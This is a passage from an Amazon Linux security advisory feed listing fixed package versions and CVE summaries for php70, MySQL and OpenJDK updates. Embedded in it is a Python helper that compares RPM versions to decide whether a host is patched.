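    """Compare two version (or release) strings the way librpm's rpmvercmp does.
    Returns 1 if a is newer, -1 if a is older, 0 if they are equal."""
    if a == b:
        return 0
    i = j = 0
    while i != len(a) or j != len(b):
        i = _skip_separators(a, i)
        j = _skip_separators(b, j)
        ca = a[i] if i != len(a) else ""
        cb = b[j] if j != len(b) else ""
        # '~' sorts before everything, including the end of the string: 1.0~rc1 is older than 1.0
        if ca == "~" or cb == "~":
            if ca != "~":
                return 1
            if cb != "~":
                return -1
            i += 1
            j += 1
            continue
        # '^' is the opposite: 1.0^git1 is newer than 1.0, but still older than 1.0.1
        if ca == "^" or cb == "^":
            if ca == "":
                return -1
            if cb == "":
                return 1
            if ca != "^":
                return 1
            if cb != "^":
                return -1
            i += 1
            j += 1
            continue
        if ca == "" or cb == "":
            break
        # Take one run of digits or one run of letters from each side.
        isnum = ca.isdigit()
        pattern = r"[0-9]+" if isnum else r"[A-Za-z]+"
        seg_a = re.match(pattern, a[i:]).group(0)
        mb = re.match(pattern, b[j:])
        seg_b = mb.group(0) if mb else ""
        i += len(seg_a)
        j += len(seg_b)
        if seg_b == "":
            # Mixed types at this position: a numeric segment beats an alphabetic one.
            return 1 if isnum else -1
        if isnum:
            seg_a = seg_a.lstrip("0")
            seg_b = seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):
                # The longer digit run (leading zeros dropped) is the larger number.
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
    if i == len(a) and j == len(b):
        return 0
    # Whichever side still has unconsumed characters is the newer one.
    return -1 if i == len(a) else 1


def evr_cmp(a, b):
    """Compare (epoch, version, release) tuples; epoch dominates, then version, then release."""
    for x, y in zip(a, b):
        r = rpmvercmp(x, y)
        if r != 0:
            return r
    return 0


def parse_nevra(s):
    """Parse 'name-[epoch:]version-release.arch', the form printed by
    rpm -q --qf '%{NAME}-%{EPOCHNUM}:%{VERSION}-%{RELEASE}.%{ARCH}' php70
    A missing epoch means 0, as in the updateinfo entries above."""
    rest, arch = s.rsplit(".", 1)
    name, version, release = rest.rsplit("-", 2)
    epoch = "0"
    if ":" in version:
        epoch, version = version.split(":", 1)
    return NEVRA(name, epoch, version, release, arch)


# Fixed builds for ALAS-2017-788, copied from the x86_64 pkglist of this update
# (a subset; the feed lists every php70 subpackage for both architectures).
ALAS_2017_788 = {
    ("php70", "x86_64"): ("0", "7.0.14", "1.20.amzn1"),
    ("php70-cli", "x86_64"): ("0", "7.0.14", "1.20.amzn1"),
    ("php70-common", "x86_64"): ("0", "7.0.14", "1.20.amzn1"),
    ("php70-fpm", "x86_64"): ("0", "7.0.14", "1.20.amzn1"),
}


def is_fixed(installed, advisory=ALAS_2017_788):
    """True if the installed package is at or above the advisory's fixed EVR,
    False if it is still vulnerable, None if the advisory does not list that name/arch."""
    fixed = advisory.get((installed.name, installed.arch))
    if fixed is None:
        return None
    return evr_cmp((installed.epoch, installed.version, installed.release), fixed) >= 0


if __name__ == "__main__":
    # Constructed installed-package strings, not output from a real host.
    labels = {True: "fixed", False: "VULNERABLE", None: "not covered"}
    for s in ("php70-7.0.13-1.19.amzn1.x86_64",
              "php70-0:7.0.14-1.20.amzn1.x86_64",
              "php70-cli-7.0.14-1.9.amzn1.x86_64",
              "php56-5.6.29-1.131.amzn1.x86_64"):
        print(s, labels[is_fixed(parse_nevra(s))])
```

The php70-cli line is the case worth remembering: release 1.9.amzn1 is older than 1.20.amzn1 under rpm's numeric segment rule, while a naive string comparison would call it newer and report the host as patched.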
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7480" title="" id="CVE-2016-7480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9137" title="" id="CVE-2016-9137" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9933" title="" id="CVE-2016-9933" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9934" title="" id="CVE-2016-9934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9935" title="" id="CVE-2016-9935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9936" title="" id="CVE-2016-9936" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-embedded" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.14" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-soap-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-xml" 
version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.14" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-snmp-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.14" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-intl-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.14" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-gmp-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.14" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-opcache-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.14-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-789</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-789: medium priority package update for mysql55</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3318:
1414357:
CVE-2017-3318 mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017)
CVE-2017-3317:
1414355:
CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017)
CVE-2017-3313:
1414353:
CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017)
CVE-2017-3258:
1414351:
CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017)
CVE-2017-3244:
1414342:
CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017)
CVE-2017-3243:
1414340:
CVE-2017-3243 mysql: Server: Charsets unspecified vulnerability (CPU Jan 2017)
CVE-2017-3238:
1414338:
CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3238" title="" id="CVE-2017-3238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3243" title="" id="CVE-2017-3243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3244" title="" id="CVE-2017-3244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3258" title="" id="CVE-2017-3258" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3313" title="" id="CVE-2017-3313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3317" title="" id="CVE-2017-3317" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3318" title="" id="CVE-2017-3318" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-test" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.54" release="1.16.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql55-embedded-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.54" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql55-embedded-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.54-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-790</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-790: medium priority package update for mysql56</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3318:
1414357:
CVE-2017-3318 mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017)
CVE-2017-3317:
1414355:
CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017)
CVE-2017-3313:
1414353:
CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017)
CVE-2017-3273:
1414352:
CVE-2017-3273 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017)
CVE-2017-3258:
1414351:
CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017)
CVE-2017-3257:
1414350:
CVE-2017-3257 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017)
CVE-2017-3244:
1414342:
CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017)
CVE-2017-3238:
1414338:
CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017)
CVE-2016-8327:
1414337:
CVE-2016-8327 mysql: Server: Replication unspecified vulnerability (CPU Jan 2017)
CVE-2016-8318:
1414335:
CVE-2016-8318 mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8318" title="" id="CVE-2016-8318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8327" title="" id="CVE-2016-8327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3238" title="" id="CVE-2017-3238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3244" title="" id="CVE-2017-3244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3257" title="" id="CVE-2017-3257" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3258" title="" id="CVE-2017-3258" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3273" title="" id="CVE-2017-3273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3313" title="" id="CVE-2017-3313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3317" title="" id="CVE-2017-3317" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3318" title="" id="CVE-2017-3318" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.35" release="1.23.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-server-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.35" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.35-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.35" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-server-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.35-1.23.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.35" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.35-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-791</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-791: critical priority package update for java-1.8.0-openjdk</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3289:
1413562:
CVE-2017-3289 OpenJDK: insecure class construction (Hotspot, 8167104)
CVE-2017-3272:
1413554:
CVE-2017-3272 OpenJDK: insufficient protected field access checks in atomic field updaters (Libraries, 8165344)
CVE-2017-3261:
1413653:
CVE-2017-3261 OpenJDK: integer overflow in SocketOutputStream boundary check (Networking, 8164147)
CVE-2017-3253:
It was discovered that the 2D component of OpenJDK performed parsing of iTXt and zTXt PNG image chunks even when configured to ignore metadata. An attacker able to make a Java application parse a specially crafted PNG image could cause the application to consume an excessive amount of memory.
1413583:
CVE-2017-3253 OpenJDK: imageio PNGImageReader failed to honor ignoreMetadata for iTXt and zTXt chunks (2D, 8166988)
CVE-2017-3252:
It was discovered that the JAAS component of OpenJDK did not correctly extract the user DN from the result of the user search LDAP query. A specially crafted user LDAP entry could cause the application to use an incorrect DN.
1413906:
CVE-2017-3252 OpenJDK: LdapLoginModule incorrect userDN extraction (JAAS, 8161743)
CVE-2017-3241:
It was discovered that the RMI registry and DCG implementations in the RMI component of OpenJDK performed deserialization of untrusted inputs. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of RMI registry or a Java RMI application.
1413955:
